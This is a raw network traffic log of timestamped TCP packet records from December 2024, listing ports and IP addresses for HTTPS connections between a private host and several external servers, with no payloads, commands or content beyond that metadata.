Dec 18, 2024 21:09:04.537899017 CET	443	49724	142.250.181.132	192.168.2.9
Dec 18, 2024 21:09:04.546500921 CET	443	49724	142.250.181.132	192.168.2.9
Dec 18, 2024 21:09:04.546565056 CET	49724	443	192.168.2.9	142.250.181.132
Dec 18, 2024 21:09:04.546571970 CET	443	49724	142.250.181.132	192.168.2.9
Dec 18, 2024 21:09:04.555752993 CET	443	49724	142.250.181.132	192.168.2.9
Dec 18, 2024 21:09:04.555810928 CET	49724	443	192.168.2.9	142.250.181.132
Dec 18, 2024 21:09:04.555819035 CET	443	49724	142.250.181.132	192.168.2.9
Dec 18, 2024 21:09:04.564105034 CET	443	49724	142.250.181.132	192.168.2.9
Dec 18, 2024 21:09:04.564250946 CET	49724	443	192.168.2.9	142.250.181.132
Dec 18, 2024 21:09:04.564265966 CET	443	49724	142.250.181.132	192.168.2.9
Dec 18, 2024 21:09:04.568110943 CET	443	49724	142.250.181.132	192.168.2.9
Dec 18, 2024 21:09:04.568372965 CET	49724	443	192.168.2.9	142.250.181.132
Dec 18, 2024 21:09:04.568380117 CET	443	49724	142.250.181.132	192.168.2.9
Dec 18, 2024 21:09:04.572096109 CET	443	49724	142.250.181.132	192.168.2.9
Dec 18, 2024 21:09:04.572578907 CET	49724	443	192.168.2.9	142.250.181.132
Dec 18, 2024 21:09:04.572591066 CET	443	49724	142.250.181.132	192.168.2.9
Dec 18, 2024 21:09:04.575068951 CET	443	49724	142.250.181.132	192.168.2.9
Dec 18, 2024 21:09:04.575196981 CET	49724	443	192.168.2.9	142.250.181.132
Dec 18, 2024 21:09:04.575206041 CET	443	49724	142.250.181.132	192.168.2.9
Dec 18, 2024 21:09:04.580915928 CET	443	49724	142.250.181.132	192.168.2.9
Dec 18, 2024 21:09:04.580981970 CET	49724	443	192.168.2.9	142.250.181.132
Dec 18, 2024 21:09:04.580992937 CET	443	49724	142.250.181.132	192.168.2.9
Dec 18, 2024 21:09:04.592252970 CET	443	49724	142.250.181.132	192.168.2.9
Dec 18, 2024 21:09:04.592304945 CET	49724	443	192.168.2.9	142.250.181.132
Dec 18, 2024 21:09:04.592324018 CET	443	49724	142.250.181.132	192.168.2.9
Dec 18, 2024 21:09:04.593516111 CET	443	49724	142.250.181.132	192.168.2.9
Dec 18, 2024 21:09:04.593556881 CET	49724	443	192.168.2.9	142.250.181.132
Dec 18, 2024 21:09:04.593564987 CET	443	49724	142.250.181.132	192.168.2.9
Dec 18, 2024 21:09:04.597914934 CET	443	49724	142.250.181.132	192.168.2.9
Dec 18, 2024 21:09:04.597971916 CET	49724	443	192.168.2.9	142.250.181.132
Dec 18, 2024 21:09:04.597984076 CET	443	49724	142.250.181.132	192.168.2.9
Dec 18, 2024 21:09:04.603754997 CET	443	49724	142.250.181.132	192.168.2.9
Dec 18, 2024 21:09:04.603894949 CET	49724	443	192.168.2.9	142.250.181.132
Dec 18, 2024 21:09:04.603929996 CET	443	49724	142.250.181.132	192.168.2.9
Dec 18, 2024 21:09:04.604217052 CET	443	49724	142.250.181.132	192.168.2.9
Dec 18, 2024 21:09:04.604271889 CET	49724	443	192.168.2.9	142.250.181.132
Dec 18, 2024 21:09:04.604286909 CET	443	49724	142.250.181.132	192.168.2.9
Dec 18, 2024 21:09:04.604299068 CET	49724	443	192.168.2.9	142.250.181.132
Dec 18, 2024 21:09:04.604337931 CET	49724	443	192.168.2.9	142.250.181.132
Dec 18, 2024 21:09:04.604337931 CET	49724	443	192.168.2.9	142.250.181.132
Dec 18, 2024 21:09:05.413594007 CET	49738	443	192.168.2.9	94.130.191.168
Dec 18, 2024 21:09:05.413641930 CET	443	49738	94.130.191.168	192.168.2.9
Dec 18, 2024 21:09:05.413713932 CET	49738	443	192.168.2.9	94.130.191.168
Dec 18, 2024 21:09:05.413980007 CET	49738	443	192.168.2.9	94.130.191.168
Dec 18, 2024 21:09:05.413992882 CET	443	49738	94.130.191.168	192.168.2.9
Dec 18, 2024 21:09:05.443222046 CET	49726	443	192.168.2.9	142.250.181.132
Dec 18, 2024 21:09:05.728116035 CET	443	49731	94.130.191.168	192.168.2.9
Dec 18, 2024 21:09:05.728185892 CET	49731	443	192.168.2.9	94.130.191.168
Dec 18, 2024 21:09:05.733779907 CET	49731	443	192.168.2.9	94.130.191.168
Dec 18, 2024 21:09:05.733800888 CET	443	49731	94.130.191.168	192.168.2.9
Dec 18, 2024 21:09:05.736221075 CET	49731	443	192.168.2.9	94.130.191.168
Dec 18, 2024 21:09:05.736234903 CET	443	49731	94.130.191.168	192.168.2.9
Dec 18, 2024 21:09:06.777734041 CET	443	49731	94.130.191.168	192.168.2.9
Dec 18, 2024 21:09:06.777812004 CET	443	49731	94.130.191.168	192.168.2.9
Dec 18, 2024 21:09:06.777812004 CET	49731	443	192.168.2.9	94.130.191.168
Dec 18, 2024 21:09:06.777864933 CET	49731	443	192.168.2.9	94.130.191.168
Dec 18, 2024 21:09:06.778923035 CET	49731	443	192.168.2.9	94.130.191.168
Dec 18, 2024 21:09:06.778944016 CET	443	49731	94.130.191.168	192.168.2.9
Dec 18, 2024 21:09:06.824538946 CET	443	49738	94.130.191.168	192.168.2.9
Dec 18, 2024 21:09:06.824628115 CET	49738	443	192.168.2.9	94.130.191.168
Dec 18, 2024 21:09:06.825089931 CET	49738	443	192.168.2.9	94.130.191.168
Dec 18, 2024 21:09:06.825100899 CET	443	49738	94.130.191.168	192.168.2.9
Dec 18, 2024 21:09:06.826780081 CET	49738	443	192.168.2.9	94.130.191.168
Dec 18, 2024 21:09:06.826786995 CET	443	49738	94.130.191.168	192.168.2.9
Dec 18, 2024 21:09:06.826884031 CET	49738	443	192.168.2.9	94.130.191.168
Dec 18, 2024 21:09:06.826901913 CET	443	49738	94.130.191.168	192.168.2.9
Dec 18, 2024 21:09:06.826906919 CET	49738	443	192.168.2.9	94.130.191.168
Dec 18, 2024 21:09:06.826911926 CET	443	49738	94.130.191.168	192.168.2.9
Dec 18, 2024 21:09:06.827040911 CET	49738	443	192.168.2.9	94.130.191.168
Dec 18, 2024 21:09:06.827059984 CET	443	49738	94.130.191.168	192.168.2.9
Dec 18, 2024 21:09:06.827078104 CET	49738	443	192.168.2.9	94.130.191.168
Dec 18, 2024 21:09:06.827088118 CET	443	49738	94.130.191.168	192.168.2.9
Dec 18, 2024 21:09:06.827222109 CET	49738	443	192.168.2.9	94.130.191.168
Dec 18, 2024 21:09:06.827250004 CET	443	49738	94.130.191.168	192.168.2.9
Dec 18, 2024 21:09:06.827260017 CET	49738	443	192.168.2.9	94.130.191.168
Dec 18, 2024 21:09:06.827322006 CET	49738	443	192.168.2.9	94.130.191.168
Dec 18, 2024 21:09:06.827369928 CET	49738	443	192.168.2.9	94.130.191.168
Dec 18, 2024 21:09:06.827459097 CET	443	49738	94.130.191.168	192.168.2.9
Dec 18, 2024 21:09:06.827562094 CET	49738	443	192.168.2.9	94.130.191.168
Dec 18, 2024 21:09:06.827588081 CET	443	49738	94.130.191.168	192.168.2.9
Dec 18, 2024 21:09:06.827613115 CET	49738	443	192.168.2.9	94.130.191.168
Dec 18, 2024 21:09:06.827634096 CET	49738	443	192.168.2.9	94.130.191.168
Dec 18, 2024 21:09:06.827637911 CET	443	49738	94.130.191.168	192.168.2.9
Dec 18, 2024 21:09:06.827661991 CET	443	49738	94.130.191.168	192.168.2.9
Dec 18, 2024 21:09:06.827753067 CET	49738	443	192.168.2.9	94.130.191.168
Dec 18, 2024 21:09:06.827773094 CET	443	49738	94.130.191.168	192.168.2.9
Dec 18, 2024 21:09:06.827781916 CET	49738	443	192.168.2.9	94.130.191.168
Dec 18, 2024 21:09:06.827821016 CET	49738	443	192.168.2.9	94.130.191.168
Dec 18, 2024 21:09:06.827821016 CET	443	49738	94.130.191.168	192.168.2.9
Dec 18, 2024 21:09:06.871362925 CET	443	49738	94.130.191.168	192.168.2.9
Dec 18, 2024 21:09:07.425180912 CET	49741	443	192.168.2.9	94.130.191.168
Dec 18, 2024 21:09:07.425234079 CET	443	49741	94.130.191.168	192.168.2.9
Dec 18, 2024 21:09:07.425324917 CET	49741	443	192.168.2.9	94.130.191.168
Dec 18, 2024 21:09:07.425595999 CET	49741	443	192.168.2.9	94.130.191.168
Dec 18, 2024 21:09:07.425610065 CET	443	49741	94.130.191.168	192.168.2.9
Dec 18, 2024 21:09:08.703321934 CET	443	49738	94.130.191.168	192.168.2.9
Dec 18, 2024 21:09:08.703396082 CET	49738	443	192.168.2.9	94.130.191.168
Dec 18, 2024 21:09:08.703421116 CET	443	49738	94.130.191.168	192.168.2.9
Dec 18, 2024 21:09:08.703437090 CET	443	49738	94.130.191.168	192.168.2.9
Dec 18, 2024 21:09:08.703475952 CET	49738	443	192.168.2.9	94.130.191.168
Dec 18, 2024 21:09:08.704518080 CET	49738	443	192.168.2.9	94.130.191.168
Dec 18, 2024 21:09:08.704534054 CET	443	49738	94.130.191.168	192.168.2.9
Dec 18, 2024 21:09:08.838315010 CET	443	49741	94.130.191.168	192.168.2.9
Dec 18, 2024 21:09:08.838375092 CET	49741	443	192.168.2.9	94.130.191.168
Dec 18, 2024 21:09:08.838850975 CET	49741	443	192.168.2.9	94.130.191.168
Dec 18, 2024 21:09:08.838860035 CET	443	49741	94.130.191.168	192.168.2.9
Dec 18, 2024 21:09:08.841226101 CET	49741	443	192.168.2.9	94.130.191.168
Dec 18, 2024 21:09:08.841232061 CET	443	49741	94.130.191.168	192.168.2.9
Dec 18, 2024 21:09:08.841366053 CET	49741	443	192.168.2.9	94.130.191.168
Dec 18, 2024 21:09:08.841382027 CET	443	49741	94.130.191.168	192.168.2.9
Dec 18, 2024 21:09:08.841387987 CET	49741	443	192.168.2.9	94.130.191.168
Dec 18, 2024 21:09:08.841403008 CET	443	49741	94.130.191.168	192.168.2.9
Dec 18, 2024 21:09:08.841506004 CET	49741	443	192.168.2.9	94.130.191.168
Dec 18, 2024 21:09:08.841526985 CET	443	49741	94.130.191.168	192.168.2.9
Dec 18, 2024 21:09:08.841675043 CET	49741	443	192.168.2.9	94.130.191.168
Dec 18, 2024 21:09:08.841685057 CET	443	49741	94.130.191.168	192.168.2.9
Dec 18, 2024 21:09:09.489331961 CET	49742	443	192.168.2.9	94.130.191.168
Dec 18, 2024 21:09:09.489377975 CET	443	49742	94.130.191.168	192.168.2.9
Dec 18, 2024 21:09:09.489469051 CET	49742	443	192.168.2.9	94.130.191.168
Dec 18, 2024 21:09:09.489701986 CET	49742	443	192.168.2.9	94.130.191.168
Dec 18, 2024 21:09:09.489712000 CET	443	49742	94.130.191.168	192.168.2.9
Dec 18, 2024 21:09:10.315810919 CET	443	49741	94.130.191.168	192.168.2.9
Dec 18, 2024 21:09:10.315895081 CET	49741	443	192.168.2.9	94.130.191.168
Dec 18, 2024 21:09:10.315907001 CET	443	49741	94.130.191.168	192.168.2.9
Dec 18, 2024 21:09:10.315956116 CET	49741	443	192.168.2.9	94.130.191.168
Dec 18, 2024 21:09:10.316752911 CET	49741	443	192.168.2.9	94.130.191.168
Dec 18, 2024 21:09:10.316771030 CET	443	49741	94.130.191.168	192.168.2.9
Dec 18, 2024 21:09:10.507503986 CET	49743	443	192.168.2.9	94.130.191.168
Dec 18, 2024 21:09:10.507554054 CET	443	49743	94.130.191.168	192.168.2.9
Dec 18, 2024 21:09:10.507720947 CET	49743	443	192.168.2.9	94.130.191.168
Dec 18, 2024 21:09:10.507961035 CET	49743	443	192.168.2.9	94.130.191.168
Dec 18, 2024 21:09:10.507977009 CET	443	49743	94.130.191.168	192.168.2.9
Dec 18, 2024 21:09:10.891115904 CET	443	49742	94.130.191.168	192.168.2.9
Dec 18, 2024 21:09:10.891206026 CET	49742	443	192.168.2.9	94.130.191.168
Dec 18, 2024 21:09:10.891684055 CET	49742	443	192.168.2.9	94.130.191.168
Dec 18, 2024 21:09:10.891696930 CET	443	49742	94.130.191.168	192.168.2.9
Dec 18, 2024 21:09:10.893704891 CET	49742	443	192.168.2.9	94.130.191.168
Dec 18, 2024 21:09:10.893723965 CET	443	49742	94.130.191.168	192.168.2.9
Dec 18, 2024 21:09:10.893774033 CET	49742	443	192.168.2.9	94.130.191.168
Dec 18, 2024 21:09:10.893786907 CET	443	49742	94.130.191.168	192.168.2.9
Dec 18, 2024 21:09:10.893791914 CET	49742	443	192.168.2.9	94.130.191.168
Dec 18, 2024 21:09:10.893795967 CET	443	49742	94.130.191.168	192.168.2.9
Dec 18, 2024 21:09:10.893893957 CET	49742	443	192.168.2.9	94.130.191.168
Dec 18, 2024 21:09:10.893904924 CET	443	49742	94.130.191.168	192.168.2.9
Dec 18, 2024 21:09:10.893917084 CET	49742	443	192.168.2.9	94.130.191.168
Dec 18, 2024 21:09:10.893923044 CET	443	49742	94.130.191.168	192.168.2.9
Dec 18, 2024 21:09:10.894010067 CET	49742	443	192.168.2.9	94.130.191.168
Dec 18, 2024 21:09:10.894028902 CET	49742	443	192.168.2.9	94.130.191.168
Dec 18, 2024 21:09:10.894094944 CET	443	49742	94.130.191.168	192.168.2.9
Dec 18, 2024 21:09:10.894129992 CET	49742	443	192.168.2.9	94.130.191.168
Dec 18, 2024 21:09:10.894134998 CET	443	49742	94.130.191.168	192.168.2.9
Dec 18, 2024 21:09:10.894159079 CET	49742	443	192.168.2.9	94.130.191.168
Dec 18, 2024 21:09:10.894165039 CET	443	49742	94.130.191.168	192.168.2.9
Dec 18, 2024 21:09:10.894264936 CET	49742	443	192.168.2.9	94.130.191.168
Dec 18, 2024 21:09:10.894274950 CET	443	49742	94.130.191.168	192.168.2.9
Dec 18, 2024 21:09:10.894296885 CET	49742	443	192.168.2.9	94.130.191.168
Dec 18, 2024 21:09:10.894306898 CET	443	49742	94.130.191.168	192.168.2.9
Dec 18, 2024 21:09:10.894319057 CET	49742	443	192.168.2.9	94.130.191.168
Dec 18, 2024 21:09:10.894324064 CET	443	49742	94.130.191.168	192.168.2.9
Dec 18, 2024 21:09:11.911401987 CET	443	49743	94.130.191.168	192.168.2.9
Dec 18, 2024 21:09:11.911461115 CET	49743	443	192.168.2.9	94.130.191.168
Dec 18, 2024 21:09:11.911849022 CET	49743	443	192.168.2.9	94.130.191.168
Dec 18, 2024 21:09:11.911856890 CET	443	49743	94.130.191.168	192.168.2.9
Dec 18, 2024 21:09:11.913781881 CET	49743	443	192.168.2.9	94.130.191.168
Dec 18, 2024 21:09:11.913786888 CET	443	49743	94.130.191.168	192.168.2.9
Dec 18, 2024 21:09:12.699405909 CET	443	49742	94.130.191.168	192.168.2.9
Dec 18, 2024 21:09:12.699496984 CET	443	49742	94.130.191.168	192.168.2.9
Dec 18, 2024 21:09:12.699516058 CET	49742	443	192.168.2.9	94.130.191.168
Dec 18, 2024 21:09:12.699547052 CET	49742	443	192.168.2.9	94.130.191.168
Dec 18, 2024 21:09:12.718605042 CET	49742	443	192.168.2.9	94.130.191.168
Dec 18, 2024 21:09:12.718641043 CET	443	49742	94.130.191.168	192.168.2.9
Dec 18, 2024 21:09:12.970622063 CET	443	49743	94.130.191.168	192.168.2.9
Dec 18, 2024 21:09:12.970702887 CET	443	49743	94.130.191.168	192.168.2.9
Dec 18, 2024 21:09:12.970808029 CET	49743	443	192.168.2.9	94.130.191.168
Dec 18, 2024 21:09:13.166982889 CET	49743	443	192.168.2.9	94.130.191.168
Dec 18, 2024 21:09:13.167011023 CET	443	49743	94.130.191.168	192.168.2.9
Dec 18, 2024 21:09:27.692739010 CET	49761	443	192.168.2.9	142.250.181.65
Dec 18, 2024 21:09:27.692794085 CET	443	49761	142.250.181.65	192.168.2.9
Dec 18, 2024 21:09:27.692904949 CET	49761	443	192.168.2.9	142.250.181.65
Dec 18, 2024 21:09:27.693078041 CET	49761	443	192.168.2.9	142.250.181.65
Dec 18, 2024 21:09:27.693109035 CET	443	49761	142.250.181.65	192.168.2.9
Dec 18, 2024 21:09:29.261719942 CET	49770	443	192.168.2.9	172.64.41.3
Dec 18, 2024 21:09:29.261776924 CET	443	49770	172.64.41.3	192.168.2.9
Dec 18, 2024 21:09:29.261842966 CET	49770	443	192.168.2.9	172.64.41.3
Dec 18, 2024 21:09:29.266190052 CET	49771	443	192.168.2.9	162.159.61.3
Dec 18, 2024 21:09:29.266226053 CET	443	49771	162.159.61.3	192.168.2.9
Dec 18, 2024 21:09:29.266279936 CET	49771	443	192.168.2.9	162.159.61.3
Dec 18, 2024 21:09:29.266676903 CET	49771	443	192.168.2.9	162.159.61.3
Dec 18, 2024 21:09:29.266690969 CET	443	49771	162.159.61.3	192.168.2.9
Dec 18, 2024 21:09:29.267067909 CET	49770	443	192.168.2.9	172.64.41.3
Dec 18, 2024 21:09:29.267081976 CET	443	49770	172.64.41.3	192.168.2.9
Dec 18, 2024 21:09:29.295129061 CET	49772	443	192.168.2.9	162.159.61.3
Dec 18, 2024 21:09:29.295180082 CET	443	49772	162.159.61.3	192.168.2.9
Dec 18, 2024 21:09:29.295255899 CET	49772	443	192.168.2.9	162.159.61.3
Dec 18, 2024 21:09:29.296308994 CET	49772	443	192.168.2.9	162.159.61.3
Dec 18, 2024 21:09:29.296328068 CET	443	49772	162.159.61.3	192.168.2.9
Dec 18, 2024 21:09:29.588638067 CET	443	49761	142.250.181.65	192.168.2.9
Dec 18, 2024 21:09:29.682992935 CET	49761	443	192.168.2.9	142.250.181.65
Dec 18, 2024 21:09:29.789733887 CET	49761	443	192.168.2.9	142.250.181.65
Dec 18, 2024 21:09:29.789743900 CET	443	49761	142.250.181.65	192.168.2.9
Dec 18, 2024 21:09:29.790393114 CET	443	49761	142.250.181.65	192.168.2.9
Dec 18, 2024 21:09:29.790410042 CET	443	49761	142.250.181.65	192.168.2.9
Dec 18, 2024 21:09:29.790432930 CET	443	49761	142.250.181.65	192.168.2.9
Dec 18, 2024 21:09:29.790468931 CET	49761	443	192.168.2.9	142.250.181.65
Dec 18, 2024 21:09:29.790474892 CET	443	49761	142.250.181.65	192.168.2.9
Dec 18, 2024 21:09:29.790739059 CET	49761	443	192.168.2.9	142.250.181.65
Dec 18, 2024 21:09:29.791306019 CET	443	49761	142.250.181.65	192.168.2.9
Dec 18, 2024 21:09:29.802696943 CET	49761	443	192.168.2.9	142.250.181.65
Dec 18, 2024 21:09:29.802840948 CET	443	49761	142.250.181.65	192.168.2.9
Dec 18, 2024 21:09:29.806793928 CET	49761	443	192.168.2.9	142.250.181.65
Dec 18, 2024 21:09:29.806814909 CET	443	49761	142.250.181.65	192.168.2.9
Dec 18, 2024 21:09:29.919883966 CET	49770	443	192.168.2.9	172.64.41.3
Dec 18, 2024 21:09:29.921956062 CET	49773	443	192.168.2.9	172.64.41.3
Dec 18, 2024 21:09:29.921989918 CET	443	49773	172.64.41.3	192.168.2.9
Dec 18, 2024 21:09:29.922051907 CET	49773	443	192.168.2.9	172.64.41.3
Dec 18, 2024 21:09:29.923147917 CET	49772	443	192.168.2.9	162.159.61.3
Dec 18, 2024 21:09:29.923712015 CET	49771	443	192.168.2.9	162.159.61.3
Dec 18, 2024 21:09:29.923825979 CET	49777	443	192.168.2.9	162.159.61.3
Dec 18, 2024 21:09:29.923842907 CET	443	49777	162.159.61.3	192.168.2.9
Dec 18, 2024 21:09:29.923921108 CET	49777	443	192.168.2.9	162.159.61.3
Dec 18, 2024 21:09:29.924393892 CET	49778	443	192.168.2.9	162.159.61.3
Dec 18, 2024 21:09:29.924417973 CET	443	49778	162.159.61.3	192.168.2.9
Dec 18, 2024 21:09:29.924500942 CET	49778	443	192.168.2.9	162.159.61.3
Dec 18, 2024 21:09:29.925131083 CET	49773	443	192.168.2.9	172.64.41.3
Dec 18, 2024 21:09:29.925151110 CET	443	49773	172.64.41.3	192.168.2.9
Dec 18, 2024 21:09:29.925642014 CET	49778	443	192.168.2.9	162.159.61.3
Dec 18, 2024 21:09:29.925642967 CET	49777	443	192.168.2.9	162.159.61.3
Dec 18, 2024 21:09:29.925652981 CET	443	49777	162.159.61.3	192.168.2.9
Dec 18, 2024 21:09:29.925656080 CET	443	49778	162.159.61.3	192.168.2.9
Dec 18, 2024 21:09:29.959774017 CET	49780	443	192.168.2.9	172.64.41.3
Dec 18, 2024 21:09:29.959816933 CET	443	49780	172.64.41.3	192.168.2.9
Dec 18, 2024 21:09:29.959891081 CET	49780	443	192.168.2.9	172.64.41.3
Dec 18, 2024 21:09:29.960138083 CET	49780	443	192.168.2.9	172.64.41.3
Dec 18, 2024 21:09:29.960150957 CET	443	49780	172.64.41.3	192.168.2.9
Dec 18, 2024 21:09:29.963340044 CET	443	49772	162.159.61.3	192.168.2.9
Dec 18, 2024 21:09:29.967340946 CET	443	49770	172.64.41.3	192.168.2.9
Dec 18, 2024 21:09:29.967365980 CET	443	49771	162.159.61.3	192.168.2.9
Dec 18, 2024 21:09:29.987858057 CET	49761	443	192.168.2.9	142.250.181.65
Dec 18, 2024 21:09:30.003511906 CET	49781	443	192.168.2.9	162.159.61.3
Dec 18, 2024 21:09:30.003552914 CET	443	49781	162.159.61.3	192.168.2.9
Dec 18, 2024 21:09:30.003617048 CET	49781	443	192.168.2.9	162.159.61.3
Dec 18, 2024 21:09:30.003938913 CET	49781	443	192.168.2.9	162.159.61.3
Dec 18, 2024 21:09:30.003952026 CET	443	49781	162.159.61.3	192.168.2.9
Dec 18, 2024 21:09:30.055728912 CET	49782	443	192.168.2.9	162.159.61.3
Dec 18, 2024 21:09:30.055780888 CET	443	49782	162.159.61.3	192.168.2.9
Dec 18, 2024 21:09:30.055974960 CET	49782	443	192.168.2.9	162.159.61.3
Dec 18, 2024 21:09:30.057437897 CET	49782	443	192.168.2.9	162.159.61.3
Dec 18, 2024 21:09:30.057451963 CET	443	49782	162.159.61.3	192.168.2.9
Dec 18, 2024 21:09:30.209619045 CET	49792	443	192.168.2.9	18.165.220.57
Dec 18, 2024 21:09:30.209669113 CET	443	49792	18.165.220.57	192.168.2.9
Dec 18, 2024 21:09:30.209774971 CET	49792	443	192.168.2.9	18.165.220.57
Dec 18, 2024 21:09:30.210823059 CET	49792	443	192.168.2.9	18.165.220.57
Dec 18, 2024 21:09:30.210836887 CET	443	49792	18.165.220.57	192.168.2.9
Dec 18, 2024 21:09:30.225927114 CET	49796	443	192.168.2.9	94.130.191.168
Dec 18, 2024 21:09:30.225964069 CET	443	49796	94.130.191.168	192.168.2.9
Dec 18, 2024 21:09:30.226088047 CET	49796	443	192.168.2.9	94.130.191.168
Dec 18, 2024 21:09:30.226491928 CET	49796	443	192.168.2.9	94.130.191.168
Dec 18, 2024 21:09:30.226505041 CET	443	49796	94.130.191.168	192.168.2.9
Dec 18, 2024 21:09:30.309169054 CET	443	49761	142.250.181.65	192.168.2.9
Dec 18, 2024 21:09:30.313041925 CET	443	49761	142.250.181.65	192.168.2.9
Dec 18, 2024 21:09:30.313100100 CET	49761	443	192.168.2.9	142.250.181.65
Dec 18, 2024 21:09:30.313112974 CET	443	49761	142.250.181.65	192.168.2.9
Dec 18, 2024 21:09:30.324769020 CET	443	49761	142.250.181.65	192.168.2.9
Dec 18, 2024 21:09:30.324837923 CET	49761	443	192.168.2.9	142.250.181.65
Dec 18, 2024 21:09:30.324856997 CET	443	49761	142.250.181.65	192.168.2.9
Dec 18, 2024 21:09:30.334440947 CET	443	49761	142.250.181.65	192.168.2.9
Dec 18, 2024 21:09:30.334513903 CET	49761	443	192.168.2.9	142.250.181.65
Dec 18, 2024 21:09:30.334525108 CET	443	49761	142.250.181.65	192.168.2.9
Dec 18, 2024 21:09:30.347040892 CET	443	49761	142.250.181.65	192.168.2.9
Dec 18, 2024 21:09:30.347096920 CET	49761	443	192.168.2.9	142.250.181.65
Dec 18, 2024 21:09:30.347105026 CET	443	49761	142.250.181.65	192.168.2.9
Dec 18, 2024 21:09:30.360656977 CET	443	49761	142.250.181.65	192.168.2.9
Dec 18, 2024 21:09:30.360713005 CET	49761	443	192.168.2.9	142.250.181.65
Dec 18, 2024 21:09:30.360721111 CET	443	49761	142.250.181.65	192.168.2.9
Dec 18, 2024 21:09:30.374475956 CET	443	49761	142.250.181.65	192.168.2.9
Dec 18, 2024 21:09:30.374542952 CET	49761	443	192.168.2.9	142.250.181.65
Dec 18, 2024 21:09:30.374552011 CET	443	49761	142.250.181.65	192.168.2.9
Dec 18, 2024 21:09:30.433109999 CET	443	49761	142.250.181.65	192.168.2.9
Dec 18, 2024 21:09:30.433317900 CET	443	49761	142.250.181.65	192.168.2.9
Dec 18, 2024 21:09:30.433475971 CET	49761	443	192.168.2.9	142.250.181.65
Dec 18, 2024 21:09:30.433495998 CET	443	49761	142.250.181.65	192.168.2.9
Dec 18, 2024 21:09:30.433548927 CET	49761	443	192.168.2.9	142.250.181.65
Dec 18, 2024 21:09:30.441530943 CET	443	49761	142.250.181.65	192.168.2.9
Dec 18, 2024 21:09:30.485503912 CET	443	49771	162.159.61.3	192.168.2.9
Dec 18, 2024 21:09:30.485588074 CET	49771	443	192.168.2.9	162.159.61.3
Dec 18, 2024 21:09:30.489499092 CET	443	49770	172.64.41.3	192.168.2.9
Dec 18, 2024 21:09:30.489583015 CET	49770	443	192.168.2.9	172.64.41.3
Dec 18, 2024 21:09:30.505583048 CET	443	49761	142.250.181.65	192.168.2.9
Dec 18, 2024 21:09:30.505656958 CET	49761	443	192.168.2.9	142.250.181.65
Dec 18, 2024 21:09:30.505681992 CET	443	49761	142.250.181.65	192.168.2.9
Dec 18, 2024 21:09:30.508276939 CET	443	49772	162.159.61.3	192.168.2.9
Dec 18, 2024 21:09:30.508351088 CET	49772	443	192.168.2.9	162.159.61.3
Dec 18, 2024 21:09:30.513062954 CET	443	49761	142.250.181.65	192.168.2.9
Dec 18, 2024 21:09:30.513124943 CET	49761	443	192.168.2.9	142.250.181.65
Dec 18, 2024 21:09:30.513138056 CET	443	49761	142.250.181.65	192.168.2.9
Dec 18, 2024 21:09:30.521404028 CET	443	49761	142.250.181.65	192.168.2.9
Dec 18, 2024 21:09:30.521461010 CET	49761	443	192.168.2.9	142.250.181.65
Dec 18, 2024 21:09:30.521470070 CET	443	49761	142.250.181.65	192.168.2.9
Dec 18, 2024 21:09:30.534077883 CET	443	49761	142.250.181.65	192.168.2.9
Dec 18, 2024 21:09:30.534127951 CET	49761	443	192.168.2.9	142.250.181.65
Dec 18, 2024 21:09:30.534146070 CET	443	49761	142.250.181.65	192.168.2.9
Dec 18, 2024 21:09:30.547801971 CET	443	49761	142.250.181.65	192.168.2.9
Dec 18, 2024 21:09:30.547894955 CET	49761	443	192.168.2.9	142.250.181.65
Dec 18, 2024 21:09:30.547909975 CET	443	49761	142.250.181.65	192.168.2.9
Dec 18, 2024 21:09:30.560286045 CET	443	49761	142.250.181.65	192.168.2.9
Dec 18, 2024 21:09:30.560343981 CET	49761	443	192.168.2.9	142.250.181.65
Dec 18, 2024 21:09:30.560353041 CET	443	49761	142.250.181.65	192.168.2.9
Dec 18, 2024 21:09:30.573791027 CET	443	49761	142.250.181.65	192.168.2.9
Dec 18, 2024 21:09:30.574117899 CET	49761	443	192.168.2.9	142.250.181.65
Dec 18, 2024 21:09:30.574136019 CET	443	49761	142.250.181.65	192.168.2.9
Dec 18, 2024 21:09:30.587433100 CET	443	49761	142.250.181.65	192.168.2.9
Dec 18, 2024 21:09:30.587538958 CET	49761	443	192.168.2.9	142.250.181.65
Dec 18, 2024 21:09:30.587564945 CET	443	49761	142.250.181.65	192.168.2.9
Dec 18, 2024 21:09:30.601072073 CET	443	49761	142.250.181.65	192.168.2.9
Dec 18, 2024 21:09:30.601181030 CET	49761	443	192.168.2.9	142.250.181.65
Dec 18, 2024 21:09:30.601192951 CET	443	49761	142.250.181.65	192.168.2.9
Dec 18, 2024 21:09:30.613998890 CET	443	49761	142.250.181.65	192.168.2.9
Dec 18, 2024 21:09:30.615065098 CET	49761	443	192.168.2.9	142.250.181.65
Dec 18, 2024 21:09:30.615075111 CET	443	49761	142.250.181.65	192.168.2.9
Dec 18, 2024 21:09:30.626020908 CET	443	49761	142.250.181.65	192.168.2.9
Dec 18, 2024 21:09:30.626143932 CET	49761	443	192.168.2.9	142.250.181.65
Dec 18, 2024 21:09:30.626152992 CET	443	49761	142.250.181.65	192.168.2.9
Dec 18, 2024 21:09:30.637604952 CET	443	49761	142.250.181.65	192.168.2.9
Dec 18, 2024 21:09:30.637726068 CET	49761	443	192.168.2.9	142.250.181.65
Dec 18, 2024 21:09:30.637737036 CET	443	49761	142.250.181.65	192.168.2.9
Dec 18, 2024 21:09:30.649365902 CET	443	49761	142.250.181.65	192.168.2.9
Dec 18, 2024 21:09:30.649466991 CET	49761	443	192.168.2.9	142.250.181.65
Dec 18, 2024 21:09:30.649480104 CET	443	49761	142.250.181.65	192.168.2.9
Dec 18, 2024 21:09:30.661181927 CET	443	49761	142.250.181.65	192.168.2.9
Dec 18, 2024 21:09:30.661248922 CET	49761	443	192.168.2.9	142.250.181.65
Dec 18, 2024 21:09:30.661262989 CET	443	49761	142.250.181.65	192.168.2.9
Dec 18, 2024 21:09:30.686121941 CET	443	49761	142.250.181.65	192.168.2.9
Dec 18, 2024 21:09:30.686196089 CET	49761	443	192.168.2.9	142.250.181.65
Dec 18, 2024 21:09:30.686213017 CET	443	49761	142.250.181.65	192.168.2.9
Dec 18, 2024 21:09:30.688164949 CET	443	49761	142.250.181.65	192.168.2.9
Dec 18, 2024 21:09:30.688227892 CET	49761	443	192.168.2.9	142.250.181.65
Dec 18, 2024 21:09:30.688235998 CET	443	49761	142.250.181.65	192.168.2.9
Dec 18, 2024 21:09:30.696652889 CET	443	49761	142.250.181.65	192.168.2.9
Dec 18, 2024 21:09:30.696742058 CET	49761	443	192.168.2.9	142.250.181.65
Dec 18, 2024 21:09:30.696748972 CET	443	49761	142.250.181.65	192.168.2.9
